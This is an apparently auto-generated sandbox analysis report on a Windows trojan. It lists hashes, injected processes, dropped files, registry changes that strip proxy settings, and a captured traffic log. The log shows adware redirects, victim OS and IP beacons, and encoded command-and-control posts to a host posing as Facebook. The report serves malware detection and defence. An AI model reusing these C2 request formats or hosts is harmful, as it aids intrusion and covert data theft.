Trojan.GenericKD.3790753_6b0f84e316

by malwarelabrobot on December 3rd, 2016 in Malware Descriptions.

Trojan.Win32.Swisyn.fptd (Kaspersky), Trojan.GenericKD.3790753 (B) (Emsisoft), Trojan.GenericKD.3790753 (AdAware), Trojan.Win32.Swrort.3.FD, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 6b0f84e316bf9990c964e8c4047a0f28
SHA1: 5f98ceb2bfdc8e843bb96a306b96d71373237891
SHA256: 4a7c168015c1c6c883e8bf94cf187177dbb4680ce9faf73b85d8b2702169dcbc
SSDeep: 98304:UvSx8tfFKAfUntOlxy1Qn/ROhPxW6huquKsCGI:UvSx8dxfUntGxyFhPdhuquKsCh
Size: 4019693 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2011-05-24 18:16:01
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2948

The Trojan injects its code into the following process(es):

dllhost.exe:2044
svchost.exe:2944

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process dllhost.exe:2044 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101020161017 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016102820161029 (0 bytes)

The process %original file name%.exe:2948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe (6076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe (9645 bytes)

Registry activity

The process dllhost.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process %original file name%.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
8ba905011841289cdfc95f195eaaaba4 c:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe
6b16b8b3808adc5fd7182f188803bc44 c:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 71955 72192 4.55918 3c72b06e02f4afbad83d6aa896575140
.rdata 77824 13612 13824 3.44888 62fb898719481a603059fc42554f80ef
.data 94208 10604 2048 2.55588 4cb364a72e7c9869ec05686d3fe4aabe
.rsrc 106496 69632 69632 0.861377 f485a9daf9ceb63414b8bf978c320b82

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
21da04796db2ffc3d949116e2d416367

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /s/roboto/v15/d-6IYplOFocCacKzxwXSOD8E0i7KZn-EPnyo3HZu7kw.woff HTTP/1.1
Accept: */*
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Origin: hXXp://free.mytransitguide.com
Accept-Encoding: gzip, deflate
Host: fonts.gstatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: font/woff
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Wed, 23 Nov 2016 11:55:02 GMT
Expires: Thu, 23 Nov 2017 11:55:02 GMT
Last-Modified: Wed, 14 Jan 2015 22:48:06 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 18568
X-XSS-Protection: 1; mode=block
Age: 799772
Cache-Control: public, max-age=31536000

<<< skipped >>>

GET /images/download/myway/pbmw_0215.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ak.imgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 06 Apr 2015 15:45:14 GMT
ETag: "7c4da-e6e-513102f2028b9"
Accept-Ranges: bytes
Content-Length: 3694
Cache-Control: max-age=315356122
Expires: Thu, 03 Apr 2025 15:45:14 GMT
Content-Type: image/png
Date: Fri, 02 Dec 2016 18:04:34 GMT
Connection: keep-alive

<<< skipped >>>

GET /s/roboto/v15/2UX7WLTfW3W8TclTUvlFyQ.woff HTTP/1.1
Accept: */*
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Origin: hXXp://free.mytransitguide.com
Accept-Encoding: gzip, deflate
Host: fonts.gstatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: font/woff
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Thu, 10 Nov 2016 00:36:11 GMT
Expires: Fri, 10 Nov 2017 00:36:11 GMT
Last-Modified: Wed, 14 Jan 2015 22:47:37 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 18520
X-XSS-Protection: 1; mode=block
Age: 1963703
Cache-Control: public, max-age=31536000

<<< skipped >>>

GET /images/vicinio/dsp-images/222010004/background999/1458663898223.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/installError.jhtml?errorType=browser&errorCode=blockedCountry
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ak.imgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 22 Mar 2016 16:24:59 GMT
ETag: "d60bc-264b0-52ea5a7985c6e"
Accept-Ranges: bytes
Content-Length: 156848
Cache-Control: max-age=293322024
Expires: Fri, 20 Mar 2026 16:24:59 GMT
Content-Type: image/png
Date: Fri, 02 Dec 2016 18:04:35 GMT
Connection: keep-alive

<<< skipped >>>

GET /images/vicinio/dsp-images/michael.lockwood/assetRebuttal_1/1470778641078.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ak.imgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 09 Aug 2016 21:37:20 GMT
ETag: "85a217-15af-539aa56665f89"
Accept-Ranges: bytes
Content-Length: 5551
Cache-Control: max-age=305436765
Expires: Fri, 07 Aug 2026 21:37:20 GMT
Content-Type: image/png
Date: Fri, 02 Dec 2016 18:04:34 GMT
Connection: keep-alive

<<< skipped >>>

GET /css?family=Maven+Pro:700,900|Roboto:400,700,900 HTTP/1.1
Accept: text/css
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: fonts.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Fri, 02 Dec 2016 18:04:33 GMT
Date: Fri, 02 Dec 2016 18:04:33 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<<< skipped >>>

GET /?a=539528&c=1430992&m=32&s1=17 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hXXp://bus.ad-jump.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: lxudv.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: hXXp://free.mytransitguide.com/index.jhtml
Server: Microsoft-IIS/8.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: sid=vK37VRG0YSdzkOs5qTRdA9Z14UJ6QEFEq3sJkZYFAp6btXDsM0tytg==; domain=.lxudv.com; path=/; HttpOnly
Set-Cookie: trk=dp 7peOVS71x3OA61HaNPNZ14UJ6QEFEq3sJkZYFAp6btXDsM0tytg==; domain=.lxudv.com; expires=Thu, 02-Dec-2021 18:04:14 GMT; path=/; HttpOnly
Set-Cookie: c38465=vK37VRG0YSdCxOfZKuiWlcPLj5T5gYhupmXc7hJQzpwdFAkm5pFJoNMevdOkv9Ra; domain=.lxudv.com; expires=Sun, 01-Jan-2017 18:04:14 GMT; path=/; HttpOnly
Date: Fri, 02 Dec 2016 18:04:14 GMT
Content-Length: 159
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="hXXp://free.mytransitguide.com/index.jhtml">here</a>.</h2>
</body></html>

<<< skipped >>>

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: bus.ad-jump.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 11 Nov 2016 14:41:43 GMT
Accept-Ranges: bytes
ETag: "26eafb8293cd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:29 GMT
Content-Length: 87
<script>window.location.href='hXXp://lxudv.com/?a=539528&c=1430992&m=32&s1=17'</script>


GET /installError.jhtml?errorType=browser&errorCode=blockedCountry HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: free.mytransitguide.com
Connection: Keep-Alive
Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701872936&nv=3&t=-&v=-&p=-&si=-&sn=dubprdsndlbfe47.dub.jabodo.com&od=bus.ad-jump.com&op=-&ok=-&om=referral&ob=-&oc=-&os=-&w=1276&h=846&cd=24&f=10.0&g=-&xlang=en&xrp=^BNH^orgyyy^S18590^ua&xrt=S18590&xuer=1&xgc=false&xrco=BNH&xrca=orgyyy&xrcc=ua&tbGuid=75357AF2-6820-49C9-86BD-ECF2
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 18:04:34 GMT
Server: Apache-Coyote/1.1
P3P: CP='CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-UA
Set-Cookie: sessionData="eM8hGio79AhShEic3iyflDqBDEWs0qHfCkXaLgses0EUAUJbWMthbxKLdhWjWIIab9HzKn44fQ916lYP0279s20CXp3Rsg/8xJ9cRob2SskrlqFVgWLktLXejfDjgTlT5YmMQwFlCvR5hn6iYMaMPc1dxuGAS 5Ao5rbmI4gWGbIjR 6rqjrOAK32B56/RuC3XwasduDL4T jqwXu6dF2l5yP6Eh0f PwQ8lXGEDaf7r8WP7z4uyjeW3BC0l3kswI6qbLTs5/lcidHLJAKWvAMzBuHgzE5peSufxGV90jebaNwsedd32MQE6Ck2T7xP 91B2By gwEyvKWzDA/E2W Ojq92fB FumE956LuEhkV qiV/RoSReyMIYDxTSkY8/v1OpT7cPdbRSIod021Qb0mWGKtM0vyOHoxhBIQEEg C3iwJLP9YSZJQeEfgbhz0FLxAdngNpUhWbeE2b8je57uV2/1/tIuwylfrHPbmDV5 3fS3XUQelnSXbPWzhWi8GdLujYquTTo2rTcOUb7xgHSuS01HIsgljjb81sxDNZwhHwyt6G11P/w8p7TBzVF0US6fQCPhiTZExtvxTlEdb/8sOrsKcoH44jUVfceuIk7yD eRgFmevaj6FdxyGN5T1hlBsYx/48i826ekoWEemVZSr8Q43rYgMr45fDpql00Dxs2oWgZKYdwFfhAcl LL6/Fj 8 Lso3ltwQtJd5LMHiBB/h2mUKKHQJJcdB 8c8wb4GeTgH1cYnCpMOrZUDjAcPLZMQv67 j5iRm29uBhA=="; Version=1; Domain=.mytransitguide.com; Path=/
Set-Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_UA; Path=/
Set-Cookie: anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701874788&nv=4&t=-&v=-&p=-&si=-&sn=dubprdsndlbfe47.dub.jabodo.com&od=bus.ad-jump.com&op=-&ok=-&om=referral&ob=-&oc=-&os=-&w=1276&h=846&cd=24&f=10.0&g=-&xlang=en&xrp=^BNH^orgyyy^S18590^ua&xrt=S18590&xuer=1&xgc=false&xrco=BNH&xrca=orgyyy&xrcc=ua&tbGuid=52828238-BE93-4D94-9335-3B9A33ECAE88&xh=8681&xi=MSNI&xtp=vhigh&xp=vicinio&xtt=template_new&xpp=^BNH^orgyyy^S18590^ua&xs=29954&xt=intdefault&xcid=3121b0a55fdb4060b313a5cb88f90289&xx=install&xracl=&xckoid=&xgds=&xad=&xmvte=&xit=&xmvtv=&xmvtt=&xckid=&xrm=&xrs=&xnt=&xriad=&xft=&xrkw=&surveyUrl=&xkw=&xct=&xiad=&xbkw=&xg=&xn=&xu="; Version=1; Domain=.mytransitguide.com; Max-Age=7776000; Expires=Thu, 02-Mar-2017 18:04:34 GMT; Path=/
Via: 1.1 VVV.mapsgalaxy.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

<<< skipped >>>

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: free.mytransitguide.com
Connection: Keep-Alive
Cookie: sessionData="eM8hGio79AhShEic3iyflDqBDEWs0qHfCkXaLgses0EUAUJbWMthbxKLdhWjWIIab9HzKn44fQ916lYP0279s20CXp3Rsg/8xJ9cRob2SskrlqFVgWLktLXejfDjgTlT5YmMQwFlCvR5hn6iYMaMPc1dxuGAS 5Ao5rbmI4gWGbIjR 6rqjrOAK32B56/RuC3XwasduDL4T jqwXu6dF2l5yP6Eh0f PwQ8lXGEDaf7r8WP7z4uyjeW3BC0l3kswI6qbLTs5/lcidHLJAKWvAMzBuHgzE5peSufxGV90jebaNwsedd32MQE6Ck2T7xP 91B2By gwEyvKWzDA/E2W Ojq92fB FumE956LuEhkV qiV/RoSReyMIYDxTSkY8/v1OpT7cPdbRSIod021Qb0mWGKtM0vyOHoxhBIQEEg C3iwJLP9YSZJQeEfgbhz0FLxAdngNpUhWbeE2b8je57uV2/1/tIuwylfrHPbmDV5 3fS3XUQelnSXbPWzhWi8GdLujYquTTo2rTcOUb7xgHSuS01HIsgljjb81sxDNZwhHwyt6G11P/w8p7TBzVF0US6fQCPhiTZExtvxTlEdb/8sOrsKcoH44jUVfceuIk7yD eRgFmevaj6FdxyGN5T1hlBsYx/48i826ekoWEemVZSr8Q43rYgMr45fDpql00Dxs2oWgZKYdwFfhAcl LL6/Fj 8 Lso3ltwQtJd5LMHiBB/h2mUKKHQJJcdB 8c8wb4GeTgH1cYnCpMOrZUDjAcPLZMQv67 j5iRm29uBhA=="; anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701874798&nv=5&t=-&v=-&p=-&si=-&sn=dubprdsndlbfe47.dub.jabodo.com&od=bus.ad-jump.com&op=-&ok=-&om=referral&ob=-&oc=-&os=-&w=1276&h=846&cd=24&f=10.0&g=-&xlang=en&xrp=^BNH^orgyyy^S18590^ua&xrt=S18590&xuer=1&xgc=false&xrco=BNH&xrca=orgyyy&xrcc=ua&tbGuid=52828238-BE93-4D94-9335-3B9A33ECAE88&xh=8681&xi=MSNI&xtp=vhigh&xp=vicinio&xtt=template_new&xpp=^BNH^orgyyy^S18590^ua&xs=29954&xt=intdefault&xcid=3121b0a55fdb4060b313a5cb88f90289&xx=
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 18:04:35 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"894-1478816616000"
Last-Modified: Thu, 10 Nov 2016 22:23:36 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Type: image/x-icon
Via: 1.1 VVV.mapsgalaxy.com
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked


GET /images/vicinio/dsp-images/jeremy.jacinto/asset1_3/1471015421274.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ak.imgfarm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 12 Aug 2016 15:23:41 GMT
ETag: "67f289-2244-539e177aedfcc"
Accept-Ranges: bytes
Content-Length: 8772
Cache-Control: max-age=305673547
Expires: Mon, 10 Aug 2026 15:23:41 GMT
Content-Type: image/png
Date: Fri, 02 Dec 2016 18:04:34 GMT
Connection: keep-alive

<<< skipped >>>

GET /track_ch.php?ip=194.242.96.218&o=2 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: rep.pe-wok.biz


HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Date: Fri, 02 Dec 2016 18:04:19 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Error from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hP4FNiZEn6x6FZlGnVDs12djjhnibAkbuOzugLbuWyie0a4we_x4KQ==


GET /api/report?type=1&code=Windows 7 Ultimate Edition Service Pack 1 x86 (Build:7601) | Internet Explorer 9.0.8112.16421 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: my.pcmaps.net


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:18 GMT
Content-Length: 15
{"status":true}



GET /api/ip HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: my.pcmaps.net


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:18 GMT
Content-Length: 14
194.242.96.218


GET /s/roboto/v15/mnpfi9pxYH-Go5UiibESIj8E0i7KZn-EPnyo3HZu7kw.woff HTTP/1.1
Accept: */*
Referer: hXXp://free.mytransitguide.com/index.jhtml
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Origin: hXXp://free.mytransitguide.com
Accept-Encoding: gzip, deflate
Host: fonts.gstatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: font/woff
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Tue, 08 Nov 2016 05:57:10 GMT
Expires: Wed, 08 Nov 2017 05:57:10 GMT
Last-Modified: Wed, 14 Jan 2015 22:46:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 18572
X-XSS-Protection: 1; mode=block
Age: 2117244
Cache-Control: public, max-age=31536000
<<< skipped >>>

GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: 4LxnqLHLtLKLxnvnxnELyLWnUL2n2nOn7nPnOnDnDndnOn7nDn2nznELWnLL7nOnknGnWnOnWn7nDnLLGnGnPnHnELxnInxnOLhLGLKLxnvnHnInxndLKLPLxnvnxn0LsL2LtLHLzLDLSnknSn3LZLOLsL5LbLOLKLSnELtLsLOLsLHL2LSnfLKLPLdLsLqLKLSnoLbLqL7LSnHnSnvLdnOnSnRngLkLsLZLtLvnknOn2nHnQnxnInxnXLPLHLzLDLKLPLxnvnxnxnInxnkLDLKLPLxnvnxnxnInxnGLbLDLDLxnvnxnxnInxnqLHLHL7LsLKLDLxnvnxnxnInxnbLsLtLxnvn2nInxnkLOLhLGLKLxnvn2nFB
Server-Key: nFAUgy1ELwJ9ilj8BVoM6fT3r0CuapNcSexbXqtKRQYsI7Z52HGWPDOkdzvhm4
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: RLqfNxP7CmDZBTodkivt0WhncaMHe6yj21UsYE3IVXGzbS8JrK9g5pwuQFl4OA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:18 GMT
[CODE]RLqfNxP7CmDZBTodkivt0WhncaMHe6ykm8m5mdm5L8mwm8mhm8mwm8mQm8m5L8m5
mdmpLdmBmdm0mdm5mdmFL8m9L8m5L8m5L8mhm8mam8m9L8m5mdmpLdm5mdmQm8mVm8mDm8
mhm8mwm8m9L8mrLdmMm8mpm8mFL8mVm8mQm8mwm8m9L8mgm8m7m8mBm8mHm8mpm8mrLdmT
m8mhm8m5L8mwm8mrLdmwm8mCm8mFL8m9L8mrLdm5L8mQm8mMm8mMm8m9L8m5L8m5L8mgLd
m5mdmWmGmj21UsYE3IVXGzbS8JrK9g5pwuQFl4OA[CODE]



GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: 1MpRgMkMjMuMpReRpRHM5M4RKMlRlRoRkRqRoRsRsR7RoRkRsRlR1RHM4RWMkRoRtRyR4RoR4RkRsRWMyRyRqRcRHMpR8RpReMZMoMuMpReRcR8RpRqMuMlMpReRpRCMmM8MjMkMsMcMfRtRfRPMyMeMmM4MEMeMuMfRHMjMmMeMmMkM8MfRvMuMlMqMmMgMuMfRzMEMgM2MfRcRfRQM7RoRfRORRMAMmMyMjMeRtRoRlRcR2RpR8RpRfMlMkMsMcMuMlMpReRpRpR8RpRAMcMuMlMpReRpRpR8RpRoMEMcMcMpReRpRpR8RpRgMkMkM2MmMuMcMpReRpRpR8RpREMmMjMpReRlR8RpRAMeMZMoMuMpReRlR5d
Server-Key: ND5RKaLWHUYMn6wrGJvdIzCxPV3Fb9iTBpgfEhXSuj2Om0k84ycltosqAe17ZQ
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: lCSEi1enLajNZ7Uyhpx5MHWBgzFO3cJ4rGs0q6IDvd2PYtV9koXKRmQfu8bwTA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2016 18:04:28 GMT
[CODE]lCSEi1enLajNZ7Uyhpx5MHWBgzFO3cJ0NyNeNLNcNyNwEyNRNyNwEyNuNyNcNyNe
NLNwELNjNLNbELNeNLN2NyNfNyNcNyNcNyNRNyNZNyNfNyNeNLNwELNeNLNuNyNkNyNdNy
NRNyNwEyNfNyNKELNXNyNBNyN2NyNkNyNuNyNwEyNfNyNjNyNONyNbEyNaNyNBNyNKELNV
NyNRNyNcNyNwEyNKELNwEyN3NyN2NyNfNyNKELNcNyNuNyNXNyNXNyNfNyNcNyNcNyNXNL
NeNLNxNQE4rGs0q6IDvd2PYtV9koXKRmQfu8bwTA[CODE]



GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
